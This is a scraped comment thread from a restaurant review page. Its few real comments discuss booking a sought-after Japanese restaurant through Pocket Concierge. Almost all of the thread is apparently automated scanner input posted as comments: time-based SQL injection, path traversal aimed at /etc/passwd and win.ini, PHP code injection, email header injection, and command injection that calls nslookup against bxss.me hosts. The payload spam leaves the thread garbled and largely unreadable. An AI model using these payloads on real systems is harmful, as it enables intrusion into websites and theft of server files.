-1)) OR 252=(SELECT 252 FROM PG_SLEEP(15))--
re: Leo Saito
sHPH1ush' OR 913=(SELECT 913 FROM PG_SLEEP(15))--
re: Leo Saito
UDktJgJ1') OR 188=(SELECT 188 FROM PG_SLEEP(15))--
re: Leo Saito
zRkhlWtR')) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@GM9z7
I went very recently, and it's still in my top 3. It is relatively hard to get these days though, especially since foreigners can only book 2 months in advance so most slots are taken. But it's not impossible through Pocket Concierge with enough flexibility.
Definitely worth trying for it. Also only 33k is an absolute steal for the quality and quantity you get.
re: Eric Yu
I8C677x7
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+282-282-1=0+0+0+1
re: Eric Yu
-1 OR 3+282-282-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
AYdhrSac'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 374=(SELECT 374 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 228=(SELECT 228 FROM PG_SLEEP(15))--
re: Eric Yu
LLKCGo6v' OR 822=(SELECT 822 FROM PG_SLEEP(15))--
re: Eric Yu
X0EpzYdt') OR 259=(SELECT 259 FROM PG_SLEEP(15))--
re: Eric Yu
gcIK0jOn')) OR 622=(SELECT 622 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@w0tTS
re: Eric Yu
br6PwN6s
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+934-934-1=0+0+0+1
re: Eric Yu
-1 OR 3+934-934-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
59Fw8kPc'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 476=(SELECT 476 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 986=(SELECT 986 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 33=(SELECT 33 FROM PG_SLEEP(15))--
re: Eric Yu
MkIrA72R' OR 740=(SELECT 740 FROM PG_SLEEP(15))--
re: Eric Yu
pEgFi8l3') OR 998=(SELECT 998 FROM PG_SLEEP(15))--
re: Eric Yu
RVjyKcYZ')) OR 310=(SELECT 310 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@QTLqr
@Eric, foreigners can actually book 90 days ahead of time using pocket concierge. And for foreigners that have been there before, actually they will take down your names and you are actually allowed to make it even much earlier in advance, definitely earlier than the 4 months booking window.
@Justeat You can just try your luck messaging them in ig. They are quite responsive.
re: guest
LYhfXSOo
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+455-455-1=0+0+0+1
re: guest
-1 OR 3+455-455-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
ekm0JZ3C'; waitfor delay '0:0:15' --
re: guest
-5 OR 273=(SELECT 273 FROM PG_SLEEP(15))--
re: guest
-5) OR 162=(SELECT 162 FROM PG_SLEEP(15))--
re: guest
-1)) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
re: guest
30WdY0Np' OR 254=(SELECT 254 FROM PG_SLEEP(15))--
re: guest
DvsDdmG3') OR 479=(SELECT 479 FROM PG_SLEEP(15))--
re: guest
kJIz782c')) OR 592=(SELECT 592 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@RsgWU
re: guest
1IMoJUzr
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+289-289-1=0+0+0+1
re: guest
-1 OR 3+289-289-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
FnFrGfxG'; waitfor delay '0:0:15' --
re: guest
-5 OR 802=(SELECT 802 FROM PG_SLEEP(15))--
re: guest
-5) OR 516=(SELECT 516 FROM PG_SLEEP(15))--
re: guest
-1)) OR 902=(SELECT 902 FROM PG_SLEEP(15))--
re: guest
tcwBNIDy' OR 146=(SELECT 146 FROM PG_SLEEP(15))--
re: guest
oL0cGZ4H') OR 956=(SELECT 956 FROM PG_SLEEP(15))--
re: guest
53EGJXTY')) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@njZVj
Ahh yep. My apologies, 3 months in advance - slip of the finger.
I say it's relatively hard to book only because I've had 2 friends try and fail, though potentially they just got unlucky with dates.
In any case, it's definitely worth try for and the detour.
re: Eric Yu
qRrs2gLH
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+604-604-1=0+0+0+1
re: Eric Yu
-1 OR 3+604-604-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
jWXLfFzO'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 546=(SELECT 546 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 476=(SELECT 476 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 217=(SELECT 217 FROM PG_SLEEP(15))--
re: Eric Yu
5UIPATTl' OR 181=(SELECT 181 FROM PG_SLEEP(15))--
re: Eric Yu
1fqHjm1E') OR 676=(SELECT 676 FROM PG_SLEEP(15))--
re: Eric Yu
r6XwKnpU')) OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
pvbBzWfF
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1'"
re: Eric Yu
-1 OR 2+724-724-1=0+0+0+1
re: Eric Yu
-1 OR 3+724-724-1=0+0+0+1
re: Eric Yu
@@z5QLB
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
nNfv1t6b'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 949=(SELECT 949 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 623=(SELECT 623 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 238=(SELECT 238 FROM PG_SLEEP(15))--
re: Eric Yu
nW3U6kdC' OR 694=(SELECT 694 FROM PG_SLEEP(15))--
re: Eric Yu
WcTULJGM') OR 385=(SELECT 385 FROM PG_SLEEP(15))--
re: Eric Yu
RX83NhRI')) OR 985=(SELECT 985 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@4N41N
re: Eric Yu
1cntkBNlIO
re: Eric Yu
response.write(9677550*9887765)
re: Eric Yu
'+response.write(9677550*9887765)+'
re: Eric Yu
"+response.write(9677550*9887765)+"
re: Eric Yu
%0abcc:074625.67-21736.67.1a10c.19990.2@bxss.me
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-21749.67.1a10c.19990.2@bxss.me
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
${9999811+9999436}
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
echo riqrcm$()\ fdqxtj\nz^xyu||a #' &echo riqrcm$()\ fdqxtj\nz^xyu||a #|" &echo riqrcm$()\ fdqxtj\nz^xyu||a #
re: Eric Yu
/etc/passwd
re: Eric Yu
&echo iizfql$()\ zlfysd\nz^xyu||a #' &echo iizfql$()\ zlfysd\nz^xyu||a #|" &echo iizfql$()\ zlfysd\nz^xyu||a #
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
|echo cslnmk$()\ yuqtmu\nz^xyu||a #' |echo cslnmk$()\ yuqtmu\nz^xyu||a #|" |echo cslnmk$()\ yuqtmu\nz^xyu||a #
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
(nslookup hitamwqpoojae1f262.bxss.me||perl -e "gethostbyname('hitamwqpoojae1f262.bxss.me')")
re: Eric Yu
)
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
$(nslookup hitiojczmxctgf07af.bxss.me||perl -e "gethostbyname('hitiojczmxctgf07af.bxss.me')")
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
&nslookup hitvrpfxczjrl52eed.bxss.me&'\"`0&nslookup hitvrpfxczjrl52eed.bxss.me&`'
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
&(nslookup hitrxpctizrql756c4.bxss.me||perl -e "gethostbyname('hitrxpctizrql756c4.bxss.me')")&'\"`0&(nslookup hitrxpctizrql756c4.bxss.me||perl -e "gethostbyname('hitrxpctizrql756c4.bxss.me')")&`'
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
|(nslookup hitbrefdbwnkw8a1fa.bxss.me||perl -e "gethostbyname('hitbrefdbwnkw8a1fa.bxss.me')")
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
`(nslookup hitcdrmhkushxeb4f8.bxss.me||perl -e "gethostbyname('hitcdrmhkushxeb4f8.bxss.me')")`
re: Eric Yu
file:///etc/passwd
re: Eric Yu
;(nslookup hitzegranwvyxd57c2.bxss.me||perl -e "gethostbyname('hitzegranwvyxd57c2.bxss.me')")|(nslookup hitzegranwvyxd57c2.bxss.me||perl -e "gethostbyname('hitzegranwvyxd57c2.bxss.me')")&(nslookup hitzegranwvyxd57c2.bxss.me||perl -e "gethostbyname('hitzegranwvyxd57c2.bxss.me')")
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
'.gethostbyname(lc('hitvq'.'mkosorwifb13b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(119).chr(70).'
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
".gethostbyname(lc("hitmd"."ngtisllm3b88e.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(70).chr(119).chr(65)."
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
/etc/shells
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
bxss.me
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(116).concat(69).concat(120).concat(87)+(require"socket"
Socket.gethostbyname("hitpa"+"dlebapws87607.bxss.me.")[3].to_s)+"
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(117).concat(79).concat(105).concat(72)+(require'socket'
Socket.gethostbyname('hithr'+'gsbxipum8130a.bxss.me.')[3].to_s)+'
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
'"
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
<!--
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+911-911-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+911-911-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+961-961-1=0+0+0+1
re: Eric Yu
-1 OR 3+961-961-1=0+0+0+1
re: Eric Yu
-1' OR 2+528-528-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+528-528-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+552-552-1=0+0+0+1 or 'Fr59lGaq'='
re: Eric Yu
-1' OR 3+552-552-1=0+0+0+1 or 'Fr59lGaq'='
re: Eric Yu
-1" OR 2+503-503-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+503-503-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
